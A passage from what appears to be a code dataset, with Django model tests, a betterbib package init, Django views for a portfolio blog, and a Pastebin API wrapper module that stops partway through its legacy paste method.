core/tests/test_models.py | EthanMarrs/digit2 | 0 | 6836 | """test_models.py: runs tests on the models for digit."""
import pytest
from core.models import (Grade,
Subject,
Question,
Comment,
Option,
Topic,
Block,
Syllabus,
StateException,
)
from django.test import TestCase
from django.contrib.auth.models import User
class TestQuestion(TestCase):
"""Test the Question Model."""
def setUp(self):
"""Create questions for testing."""
grade_test = Grade(name="Grade Example")
grade_test.save()
subject_test = Subject(name="addition",
grade=grade_test)
subject_test.save()
question1 = Question(question_content='what is 1 + 1?',
answer_content='This is an addition question',
subject=subject_test)
question1.save()
def test_question_default_state(self):
"""Confirm that default state is Incomplete."""
question1 = Question.objects.all()[0]
assert(question1.state == question1.INCOMPLETE)
def test_question_state_from_incomplete(self):
"""Check that question state.
Confirm that state can only go from 'incomplete' to
'ready for review'.
"""
question1 = Question.objects.all()[0]
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 0")
assert(question1.state == question1.INCOMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_complete()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 0")
assert(question1.state == question1.INCOMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 0")
assert(question1.state == question1.INCOMPLETE)
question1.change_to_review_ready()
assert(question1.state == question1.REVIEW_READY)
def test_question_state_from_ready_for_review(self):
"""Check that question state.
Confirm that state can only go from 'ready to review' to
'complete' or 'needs reworking'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.REVIEW_READY
with pytest.raises(StateException) as exception_info:
question1.change_to_review_ready()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 1")
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 1")
assert(question1.state == question1.REVIEW_READY)
question1.change_to_complete()
assert(question1.state == question1.COMPLETE)
question1.state = question1.REVIEW_READY
question1.change_to_needs_reworking()
assert(question1.state == question1.NEEDS_REWORKING)
def test_question_state_from_needs_reworking(self):
"""Check that question state.
Confirm that state can only go from 'needs reworking' to
'ready for review'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.NEEDS_REWORKING
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 2")
assert(question1.state == question1.NEEDS_REWORKING)
with pytest.raises(StateException) as exception_info:
question1.change_to_complete()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 2")
assert(question1.state == question1.NEEDS_REWORKING)
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 2")
assert(question1.state == question1.NEEDS_REWORKING)
question1.change_to_review_ready()
assert(question1.state == question1.REVIEW_READY)
def test_question_state_from_complete(self):
"""Check that question state.
Confirm that state can only go from 'complete' to
'flagged for review'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.COMPLETE
with pytest.raises(StateException) as exception_info:
question1.change_to_review_ready()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 3")
assert(question1.state == question1.COMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_complete()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 3")
assert(question1.state == question1.COMPLETE)
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 3")
assert(question1.state == question1.COMPLETE)
question1.change_to_flagged()
assert(question1.state == question1.FLAGGED)
def test_question_state_from_flagged_for_review(self):
"""Check that question state.
Confirm that state can only go from 'flagged for review' to
'complete'.
"""
question1 = Question.objects.all()[0]
question1.state = question1.FLAGGED
with pytest.raises(StateException) as exception_info:
question1.change_to_review_ready()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 4")
assert(question1.state == question1.FLAGGED)
with pytest.raises(StateException) as exception_info:
question1.change_to_needs_reworking()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 4")
assert(question1.state == question1.FLAGGED)
with pytest.raises(StateException) as exception_info:
question1.change_to_flagged()
assert(exception_info.value.__str__() ==
"Incorrect state change. Current state is 4")
assert(question1.state == question1.FLAGGED)
question1.change_to_complete()
assert(question1.state == question1.COMPLETE)
def test_question_option_save(self):
"""Test that question cannot have option with correct answer."""
question1 = Question.objects.all()[0]
option = Option.objects.first()
option.correct = True
option.save()
assert(len(question1.option_set.all()) == 3)
assert(len(Option.objects.all()) == 3)
def test_get_comments(self):
"""
Test that the get_comments() function returns all comments
relating to a question.
"""
user = User.objects.create(username="testuser")
question1 = Question.objects.all()[0]
Comment.objects.create(text="Test comment!", question=question1, user=user)
Comment.objects.create(text="Another comment!", question=question1, user=user)
assert(len(question1.get_comments()) == 2)
assert(question1.get_comments()[0].text == "Test comment!")
assert(question1.get_comments()[0].created_at < question1.get_comments()[1].created_at)
def test_get_options(self):
"""
Test that the get_options() function returns all options
relating to a question.
"""
question1 = Question.objects.all()[0]
assert(question1.get_number_of_options() == 3)
def test_get_state(self):
question1 = Question.objects.all()[0]
assert(question1.state == question1.INCOMPLETE)
assert(question1.get_state() == "Incomplete")
class TestTopic(TestCase):
"""Test the Topic Model."""
def setUp(self):
"""Create Topic for testing."""
grade_test = Grade.objects.create(name="Grade Example")
syllabus_test = Syllabus.objects.create(grade=grade_test)
Topic.objects.create(name="Financial Mathematics",
description="Topic that involves sinking funds "
"and loan calculations",
syllabus=syllabus_test, week_start=1,
duration=3)
def test_topic_creates_blocks(self):
"""
Confirm that blocks are created automatically and associated with the
topic.
"""
blocks = Block.objects.all()
assert(len(blocks) == 3)
assert(blocks[0].topic.name == "Financial Mathematics")
def test_topic_creates_questions(self):
"""
Confirm that questions are created automatically and associated with the
correct block and topic.
"""
questions = Question.objects.all()
assert(len(questions) == 3 * 15)
assert(questions[0].block.topic.name == "Financial Mathematics")
def test_topic_number_of_questions(self):
"""
Confirm that the correct number of questions is returned by the helper
function.
"""
questions = Question.objects.all()
topics = Topic.objects.all()
assert(len(questions) == topics[0].get_number_of_questions())
def test_topic_number_of_blocks(self):
"""
Confirm that the correct number of blocks is returned by the helper
function.
"""
blocks = Block.objects.all()
topics = Topic.objects.all()
assert(len(blocks) == topics[0].get_number_of_blocks())
def test_topic_save_does_not_duplicate_questions(self):
already_created_topic = Topic.objects.get(name="Financial Mathematics")
count = 0
for block in Block.objects.filter(topic=already_created_topic):
for question in Question.objects.filter(block=block):
count += 1
assert(count == 45)
new_description = "This is a new description"
already_created_topic.description = new_description
already_created_topic.save()
edited_topic = Topic.objects.get(name="Financial Mathematics")
count = 0
for block in Block.objects.filter(topic=edited_topic):
for question in Question.objects.filter(block=block):
count += 1
assert(count == 45)
| 2.921875 | 3 |
betterbib/__init__.py | tbabej/betterbib | 0 | 6837 | <filename>betterbib/__init__.py
# -*- coding: utf-8 -*-
#
from __future__ import print_function
from betterbib.__about__ import (
__version__,
__author__,
__author_email__,
__website__,
)
from betterbib.tools import (
create_dict,
decode,
pybtex_to_dict,
pybtex_to_bibtex_string,
write,
update,
JournalNameUpdater,
translate_month
)
from betterbib.crossref import Crossref
from betterbib.dblp import Dblp
try:
import pipdate
except ImportError:
pass
else:
if pipdate.needs_checking(__name__):
print(pipdate.check(__name__, __version__), end='')
| 2.09375 | 2 |
base/views.py | omololevy/my_portfolio | 2 | 6838 | from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.core.mail import EmailMessage
from django.conf import settings
from django.template.loader import render_to_string
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.forms import UserCreationForm
from .decorators import *
from .forms import PostForm, CustomUserCreationForm, ProfileForm, UserForm
from .filters import PostFilter
from .models import *
# Create your views here.
def home(request):
posts = Post.objects.filter(active=True, featured=True)[0:3]
context = {'posts':posts}
return render(request, 'base/index.html', context)
def posts(request):
posts = Post.objects.filter(active=True)
myFilter = PostFilter(request.GET, queryset=posts)
posts = myFilter.qs
page = request.GET.get('page')
paginator = Paginator(posts, 5)
try:
posts = paginator.page(page)
except PageNotAnInteger:
posts = paginator.page(1)
except EmptyPage:
posts = paginator.page(paginator.num_pages)
context = {'posts':posts, 'myFilter':myFilter}
return render(request, 'base/posts.html', context)
def post(request, slug):
post = Post.objects.get(slug=slug)
if request.method == 'POST':
PostComment.objects.create(
author=request.user.profile,
post=post,
body=request.POST['comment']
)
messages.success(request, "Your comment has been posted successfully!")
return redirect('post', slug=post.slug)
context = {'post':post}
return render(request, 'base/post.html', context)
def profile(request):
return render(request, 'base/profile.html')
#CRUD VIEWS
@admin_only
@login_required(login_url="home")
def createPost(request):
form = PostForm()
if request.method == 'POST':
form = PostForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('posts')
context = {'form':form}
return render(request, 'base/post_form.html', context)
@admin_only
@login_required(login_url="home")
def updatePost(request, slug):
post = Post.objects.get(slug=slug)
form = PostForm(instance=post)
if request.method == 'POST':
form = PostForm(request.POST, request.FILES, instance=post)
if form.is_valid():
form.save()
return redirect('posts')
context = {'form':form}
return render(request, 'base/post_form.html', context)
@admin_only
@login_required(login_url="home")
def deletePost(request, slug):
post = Post.objects.get(slug=slug)
if request.method == 'POST':
post.delete()
return redirect('posts')
context = {'item':post}
return render(request, 'base/delete.html', context)
def sendEmail(request):
if request.method == 'POST':
template = render_to_string('base/email_template.html', {
'name':request.POST['name'],
'email':request.POST['email'],
'message':request.POST['message'],
})
email = EmailMessage(
request.POST['subject'],
template,
settings.EMAIL_HOST_USER,
['<EMAIL>']
)
email.fail_silently=False
email.send()
return render(request, 'base/email_sent.html')
def loginPage(request):
if request.user.is_authenticated:
return redirect('home')
if request.method == 'POST':
email = request.POST.get('email')
password =request.POST.get('password')
#Little Hack to work around re-building the usermodel
try:
user = User.objects.get(email=email)
user = authenticate(request, username=user.username, password=password)
except:
messages.error(request, 'User with this email does not exists')
return redirect('login')
if user is not None:
login(request, user)
return redirect('home')
else:
messages.error(request, 'Email OR password is incorrect')
context = {}
return render(request, 'base/login.html', context)
def registerPage(request):
form = CustomUserCreationForm()
if request.method == 'POST':
form = CustomUserCreationForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.save()
messages.success(request, 'Account successfuly created!')
user = authenticate(request, username=user.username, password=request.POST['<PASSWORD>'])
if user is not None:
login(request, user)
next_url = request.GET.get('next')
if next_url == '' or next_url == None:
next_url = 'home'
return redirect(next_url)
else:
messages.error(request, 'An error has occured with registration')
context = {'form':form}
return render(request, 'base/register.html', context)
def logoutUser(request):
logout(request)
return redirect('home')
@admin_only
@login_required(login_url="home")
def userAccount(request):
profile = request.user.profile
context = {'profile':profile}
return render(request, 'base/account.html', context)
@login_required(login_url="home")
def updateProfile(request):
user = request.user
profile = user.profile
form = ProfileForm(instance=profile)
if request.method == 'POST':
user_form = UserForm(request.POST, instance=user)
if user_form.is_valid():
user_form.save()
form = ProfileForm(request.POST, request.FILES, instance=profile)
if form.is_valid():
form.save()
return redirect('account')
context = {'form':form}
return render(request, 'base/profile_form.html', context)
def myEducation(request):
return render(request, 'base/education.html')
def myExperience(request):
return render(request, 'base/experience.html')
def myAchievements(request):
return render(request, 'base/achievements.html')
def myAbout(request):
return render(request, 'base/about.html')
def myContact(request):
return render(request, 'base/contact.html')
def mySkills(request):
return render(request, 'base/skills.html')
| 2.140625 | 2 |
radioLib/pastebin/pastebin.py | hephaestus9/Radio | 1 | 6839 | <reponame>hephaestus9/Radio
#!/usr/bin/env python
#############################################################################
# Pastebin.py - Python 3.2 Pastebin API.
# Copyright (C) 2012 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#############################################################################
# This software is a derivative work of:
# http://winappdbg.sourceforge.net/blog/pastebin.py
#############################################################################
__ALL__ = ['delete_paste', 'user_details', 'trending', 'pastes_by_user', 'generate_user_key',
'legacy_paste', 'paste', 'Pastebin', 'PastebinError']
import sys
import urllib
class PastebinError(RuntimeError):
"""Pastebin API error.
The error message returned by the web application is stored as the Python exception message."""
class PastebinAPI(object):
"""Pastebin API interaction object.
Public functions:
paste -- Pastes a user-specified file or string using the new API-key POST method.
legacy_paste -- Pastes a user-specified file or string using the old anonymous POST method.
generate_user_key -- Generates a session-key that is required for other functions.
pastes_by_user -- Returns all public pastes submitted by the specified login credentials.
trending -- Returns the top trending paste.
user_details -- Returns details about the user for the specified API user key.
delete_paste -- Adds two numbers together and returns the result."""
# String to determine bad API requests
_bad_request = 'Bad API request'
# Base domain name
_base_domain = 'pastebin.com'
# Valid Pastebin URLs begin with this string (kinda bvious)
_prefix_url = 'http://%s/' % _base_domain
# Valid Pastebin URLs with a custom subdomain begin with this string
_subdomain_url = 'http://%%s.%s/' % _base_domain
# URL to the LEGACY POST API
_legacy_api_url= 'http://%s/api_public.php' % _base_domain
# URL to the POST API
_api_url= 'http://%s/api/api_post.php' % _base_domain
# URL to the login POST API
_api_login_url= 'http://%s/api/api_login.php' % _base_domain
# Valid paste_expire_date values (Never, 10 minutes, 1 Hour, 1 Day, 1 Month)
paste_expire_date = ('N', '10M', '1H', '1D', '1M')
# Valid paste_expire_date values (0 = public, 1 = unlisted, 2 = private)
paste_private = ('public', 'unlisted', 'private')
# Valid parse_format values
paste_format = (
'4cs', # 4CS
'6502acme', # 6502 ACME Cross Assembler
'6502kickass', # 6502 Kick Assembler
'6502tasm', # 6502 TASM/64TASS
'abap', # ABAP
'actionscript', # ActionScript
'actionscript3', # ActionScript 3
'ada', # Ada
'algol68', # ALGOL 68
'apache', # Apache Log
'applescript', # AppleScript
'apt_sources', # APT Sources
'asm', # ASM (NASM)
'asp', # ASP
'autoconf', # autoconf
'autohotkey', # Autohotkey
'autoit', # AutoIt
'avisynth', # Avisynth
'awk', # Awk
'bascomavr', # BASCOM AVR
'bash', # Bash
'basic4gl', # Basic4GL
'bibtex', # BibTeX
'blitzbasic', # Blitz Basic
'bnf', # BNF
'boo', # BOO
'bf', # BrainFuck
'c', # C
'c_mac', # C for Macs
'cil', # C Intermediate Language
'csharp', # C#
'cpp', # C++
'cpp-qt', # C++ (with QT extensions)
'c_loadrunner', # C: Loadrunner
'caddcl', # CAD DCL
'cadlisp', # CAD Lisp
'cfdg', # CFDG
'chaiscript', # ChaiScript
'clojure', # Clojure
'klonec', # Clone C
'klonecpp', # Clone C++
'cmake', # CMake
'cobol', # COBOL
'coffeescript', # CoffeeScript
'cfm', # ColdFusion
'css', # CSS
'cuesheet', # Cuesheet
'd', # D
'dcs', # DCS
'delphi', # Delphi
'oxygene', # Delphi Prism (Oxygene)
'diff', # Diff
'div', # DIV
'dos', # DOS
'dot', # DOT
'e', # E
'ecmascript', # ECMAScript
'eiffel', # Eiffel
'email', # Email
'epc', # EPC
'erlang', # Erlang
'fsharp', # F#
'falcon', # Falcon
'fo', # FO Language
'f1', # Formula One
'fortran', # Fortran
'freebasic', # FreeBasic
'freeswitch', # FreeSWITCH
'gambas', # GAMBAS
'gml', # Game Maker
'gdb', # GDB
'genero', # Genero
'genie', # Genie
'gettext', # GetText
'go', # Go
'groovy', # Groovy
'gwbasic', # GwBasic
'haskell', # Haskell
'hicest', # HicEst
'hq9plus', # HQ9 Plus
'html4strict', # HTML
'html5', # HTML 5
'icon', # Icon
'idl', # IDL
'ini', # INI file
'inno', # Inno Script
'intercal', # INTERCAL
'io', # IO
'j', # J
'java', # Java
'java5', # Java 5
'javascript', # JavaScript
'jquery', # jQuery
'kixtart', # KiXtart
'latex', # Latex
'lb', # Liberty BASIC
'lsl2', # Linden Scripting
'lisp', # Lisp
'llvm', # LLVM
'locobasic', # Loco Basic
'logtalk', # Logtalk
'lolcode', # LOL Code
'lotusformulas', # Lotus Formulas
'lotusscript', # Lotus Script
'lscript', # LScript
'lua', # Lua
'm68k', # M68000 Assembler
'magiksf', # MagikSF
'make', # Make
'mapbasic', # MapBasic
'matlab', # MatLab
'mirc', # mIRC
'mmix', # MIX Assembler
'modula2', # Modula 2
'modula3', # Modula 3
'68000devpac', # Motorola 68000 HiSoft Dev
'mpasm', # MPASM
'mxml', # MXML
'mysql', # MySQL
'newlisp', # newLISP
'text', # None
'nsis', # NullSoft Installer
'oberon2', # Oberon 2
'objeck', # Objeck Programming Langua
'objc', # Objective C
'ocaml-brief', # OCalm Brief
'ocaml', # OCaml
'pf', # OpenBSD PACKET FILTER
'glsl', # OpenGL Shading
'oobas', # Openoffice BASIC
'oracle11', # Oracle 11
'oracle8', # Oracle 8
'oz', # Oz
'pascal', # Pascal
'pawn', # PAWN
'pcre', # PCRE
'per', # Per
'perl', # Perl
'perl6', # Perl 6
'php', # PHP
'php-brief', # PHP Brief
'pic16', # Pic 16
'pike', # Pike
'pixelbender', # Pixel Bender
'plsql', # PL/SQL
'postgresql', # PostgreSQL
'povray', # POV-Ray
'powershell', # Power Shell
'powerbuilder', # PowerBuilder
'proftpd', # ProFTPd
'progress', # Progress
'prolog', # Prolog
'properties', # Properties
'providex', # ProvideX
'purebasic', # PureBasic
'pycon', # PyCon
'python', # Python
'q', # q/kdb+
'qbasic', # QBasic
'rsplus', # R
'rails', # Rails
'rebol', # REBOL
'reg', # REG
'robots', # Robots
'rpmspec', # RPM Spec
'ruby', # Ruby
'gnuplot', # Ruby Gnuplot
'sas', # SAS
'scala', # Scala
'scheme', # Scheme
'scilab', # Scilab
'sdlbasic', # SdlBasic
'smalltalk', # Smalltalk
'smarty', # Smarty
'sql', # SQL
'systemverilog', # SystemVerilog
'tsql', # T-SQL
'tcl', # TCL
'teraterm', # Tera Term
'thinbasic', # thinBasic
'typoscript', # TypoScript
'unicon', # Unicon
'uscript', # UnrealScript
'vala', # Vala
'vbnet', # VB.NET
'verilog', # VeriLog
'vhdl', # VHDL
'vim', # VIM
'visualprolog', # Visual Pro Log
'vb', # VisualBasic
'visualfoxpro', # VisualFoxPro
'whitespace', # WhiteSpace
'whois', # WHOIS
'winbatch', # Winbatch
'xbasic', # XBasic
'xml', # XML
'xorg_conf', # Xorg Config
'xpp', # XPP
'yaml', # YAML
'z80', # Z80 Assembler
'zxbasic', # ZXBasic
)
def __init__(self):
pass
def delete_paste(self, api_dev_key, api_user_key, api_paste_key):
"""Delete the paste specified by the api_paste_key.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> paste_to_delete = x.delete_paste('453a994e0e2f1efae07f8759e59e075b',
... 'c57a18e6c0ae228cd4bd16fe36da381a',
... 'WkgcTFtv')
>>> print paste_to_delete
Paste Removed
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
@type api_paste_key: string
@param api_paste_key: The Paste Key of the paste to be deleted (string after final / in U{http://pastebin.com} URL).
@rtype: string
@returns: A successful deletion returns 'Paste Removed'.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered account
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
# Key of the paste to be deleted.
if api_paste_key is not None:
argv['api_paste_key'] = str(api_paste_key)
# Valid API option - 'user_details' in this instance
argv['api_option'] = str('delete')
# lets try to read the URL that we've just built.
request = urllib.urlopen(self._api_url, urllib.urlencode(argv))
response = self._submit_paste(request)
return response
def user_details(self, api_dev_key, api_user_key):
"""Return user details of the user specified by the api_user_key.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> details = x.user_details('453a994e0e2f1efae07f8759e59e075b',
... 'c57a18e6c0ae228cd4bd16fe36da381a')
>>> print details
<user>
<user_name>MonkeyPuzzle</user_name>
<user_format_short>python</user_format_short>
<user_expiration>N</user_expiration>
<user_avatar_url>http://pastebin.com/i/guest.gif</user_avatar_url>
<user_private>0</user_private>
<user_website></user_website>
<user_email><EMAIL></user_email>
<user_location></user_location>
<user_account_type>0</user_account_type>
</user>
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
@rtype: string
@returns: Returns an XML string containing user information.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered account to generate an api_user_key (see generate_user_key)
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
# Valid API option - 'user_details' in this instance
argv['api_option'] = str('userdetails')
# lets try to read the URL that we've just built.
request_string = urllib.urlopen(self._api_url, urllib.urlencode(argv))
response = request_string.read()
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith('<user>'):
raise PastebinError(response)
return response
def trending(self, api_dev_key):
"""Returns the top trending paste details.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> details = x.trending('453a994e0e2f1efae07f8759e59e075b')
>>> print details
<paste>
<paste_key><KEY></paste_key>
<paste_date>1333230838</paste_date>
<paste_title></paste_title>
<paste_size>6416</paste_size>
<paste_expire_date>0</paste_expire_date>
<paste_private>0</paste_private>
<paste_format_long>None</paste_format_long>
<paste_format_short>text</paste_format_short>
<paste_url>http://pastebin.com/jjMRFDH6</paste_url>
<paste_hits>6384</paste_hits>
</paste>
Note: Returns multiple trending pastes, not just 1.
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@rtype: string
@return: Returns the string (XML formatted) containing the top trending pastes.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Valid API option - 'trends' is returns trending pastes
argv['api_option'] = str('trends')
# lets try to read the URL that we've just built.
request_string = urllib.urlopen(self._api_url, urllib.urlencode(argv))
response = request_string.read()
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith('<paste>'):
raise PastebinError(response)
return response
def pastes_by_user(self, api_dev_key, api_user_key, results_limit = None):
"""Returns all pastes for the provided api_user_key.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> details = x.user_details('453a994e0e2f1efae07f8759e59e075b',
... 'c57a18e6c0ae228cd4bd16fe36da381a',
... 100)
>>> print details
<paste>
<paste_key>DLiSspYT</paste_key>
<paste_date>1332714730</paste_date>
<paste_title>Pastebin.py - Python 3.2 Pastebin.com API</paste_title>
<paste_size>25300</paste_size>
<paste_expire_date>0</paste_expire_date>
<paste_private>0</paste_private>
<paste_format_long>Python</paste_format_long>
<paste_format_short>python</paste_format_short>
<paste_url>http://pastebin.com/DLiSspYT</paste_url>
<paste_hits>70</paste_hits>
</paste>
Note: Returns multiple pastes, not just 1.
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
@type results_limit: number
@param results_limit: The number of pastes to return between 1 - 1000.
@rtype: string
@returns: Returns an XML string containing number of specified pastes by user.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered account
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
# Number of results to return - between 1 & 1000, default = 50
if results_limit is None:
argv['api_results_limit'] = 50
if results_limit is not None:
if results_limit < 1:
argv['api_results_limit'] = 50
elif results_limit > 1000:
argv['api_results_limit'] = 1000
else:
argv['api_results_limit'] = int(results_limit)
# Valid API option - 'paste' is default for new paste
argv['api_option'] = str('list')
# lets try to read the URL that we've just built.
request_string = urllib.urlopen(self._api_url, urllib.urlencode(argv))
response = request_string.read()
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith('<paste>'):
raise PastebinError(response)
return response
def generate_user_key(self, api_dev_key, username, password):
"""Generate a user session key - needed for other functions.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> my_key = x.generate_user_key('453a994e0e2f1efae07f8759e59e075b',
... 'MonkeyPuzzle',
... '12345678')
>>> print my_key
c57a18e6c0ae228cd4bd16fe36da381a
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type username: string
@param username: The username of a registered U{http://pastebin.com} account.
@type password: string
@param password: The password of a registered U{http://pastebin.com} account.
@rtype: string
@returns: Session key (api_user_key) to allow authenticated interaction to the API.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Requires pre-registered pastebin account
if username is not None:
argv['api_user_name'] = str(username)
# Requires pre-registered pastebin account
if password is not None:
argv['api_user_password'] = str(password)
# lets try to read the URL that we've just built.
request_string = urllib.urlopen(self._api_login_url, urllib.urlencode(argv))
response = request_string.read()
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
return response
def paste(self, api_dev_key, api_paste_code,
api_user_key = None, paste_name = None, paste_format = None,
paste_private = None, paste_expire_date = None):
"""Submit a code snippet to Pastebin using the new API.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> url = x.paste('453a994e0e2f1efae07f8759e59e075b' ,
... 'Snippet of code to paste goes here',
... paste_name = 'title of paste',
... api_user_key = 'c57a18e6c0ae228cd4bd16fe36da381a',
... paste_format = 'python',
... paste_private = 'unlisted',
... paste_expire_date = '10M')
>>> print url
http://pastebin.com/tawPUgqY
@type api_dev_key: string
@param api_dev_key: The API Developer Key of a registered U{http://pastebin.com} account.
@type api_paste_code: string
@param api_paste_code: The file or string to paste to body of the U{http://pastebin.com} paste.
@type api_user_key: string
@param api_user_key: The API User Key of a U{http://pastebin.com} registered user.
If none specified, paste is made as a guest.
@type paste_name: string
@param paste_name: (Optional) Title of the paste.
Default is to paste anonymously.
@type paste_format: string
@param paste_format: (Optional) Programming language of the code being
pasted. This enables syntax highlighting when reading the code in
U{http://pastebin.com}. Default is no syntax highlighting (text is
just text and not source code).
@type paste_private: string
@param paste_private: (Optional) C{'public'} if the paste is public (visible
by everyone), C{'unlisted'} if it's public but not searchable.
C{'private'} if the paste is private and not searchable or indexed.
The Pastebin FAQ (U{http://pastebin.com/faq}) claims
private pastes are not indexed by search engines (aka Google).
@type paste_expire_date: str
@param paste_expire_date: (Optional) Expiration date for the paste.
Once past this date the paste is deleted automatically. Valid
values are found in the L{PastebinAPI.paste_expire_date} class member.
If not provided, the paste never expires.
@rtype: string
@return: Returns the URL to the newly created paste.
"""
# Valid api developer key
argv = {'api_dev_key' : str(api_dev_key) }
# Code snippet to submit
if api_paste_code is not None:
argv['api_paste_code'] = str(api_paste_code)
# Valid API option - 'paste' is default for new paste
argv['api_option'] = str('paste')
# API User Key
if api_user_key is not None:
argv['api_user_key'] = str(api_user_key)
elif api_user_key is None:
argv['api_user_key'] = str('')
# Name of the poster
if paste_name is not None:
argv['api_paste_name'] = str(paste_name)
# Syntax highlighting
if paste_format is not None:
paste_format = str(paste_format).strip().lower()
argv['api_paste_format'] = paste_format
# Is the snippet private?
if paste_private is not None:
if paste_private == 'public':
argv['api_paste_private'] = int(0)
elif paste_private == 'unlisted':
argv['api_paste_private'] = int(1)
elif paste_private == 'private':
argv['api_paste_private'] = int(2)
# Expiration for the snippet
if paste_expire_date is not None:
paste_expire_date = str(paste_expire_date).strip().upper()
argv['api_paste_expire_date'] = paste_expire_date
# lets try to read the URL that we've just built.
request_string = urllib.urlopen(self._api_url, urllib.urlencode(argv))
response = request_string.read()
# do some basic error checking here so we can gracefully handle any errors we are likely to encounter
if response.startswith(self._bad_request):
raise PastebinError(response)
elif not response.startswith(self._prefix_url):
raise PastebinError(response)
return response
def legacy_paste(self, paste_code,
paste_name = None, paste_private = None,
paste_expire_date = None, paste_format = None):
"""Unofficial python interface to the Pastebin legacy API.
Unlike the official API, this one doesn't require an API key, so it's
virtually anonymous.
Usage Example::
>>> from pastebin import PastebinAPI
>>> x = PastebinAPI()
>>> url = x.legacy_paste('Snippet of code to paste goes here',
... paste_name = 'title of paste',
... paste_private = 'unlisted',
... paste_expire_date = '10M',
... paste_format = 'python')
>>> print url
http://pastebin.com/tawPUgqY
@type paste_code: string
@param paste_code: The file or string to paste to body of the U{http://pastebin.com} paste.
@type paste_name: string
@param paste_name: (Optional) Title of the paste.
Default is to paste with no title.
@type paste_private: string
@param paste_private: (Optional) C{'public'} if the paste is public (visible
by everyone), C{'unlisted'} if it's public but not searchable.
C{'private'} if the paste is private and not searchable or indexed.
The Pastebin FAQ (U{http://pastebin.com/faq}) claims
private pastes are not indexed by search engines (aka Google).
@type paste_expire_date: string
@param paste_expire_date: (Optional) Expiration date for the paste.
Once past this date the paste is deleted automatically. Valid
values are found in the L{PastebinAPI.paste_expire_date} class member.
If not provided, the paste never expires.
@type paste_format: string
@param paste_format: (Optional) Programming language of the code being
pasted. This enables syntax highlighting when reading the code in
U{http://pastebin.com}. Default is no syntax highlighting (text is
just text and not source code).
@rtype: string
@return: Returns the URL to the newly created paste.
"""
# Code snippet to submit
argv = { 'paste_code' : str(paste_code) }
# Name of the poster
if paste_name is not None:
argv['paste_name'] = str(paste_name)
# Is the snippet private?
if paste_private is not None:
argv['paste_private'] = int(bool(int(paste_private)))
# Expiration for the snippet
if paste_expire_date is not None:
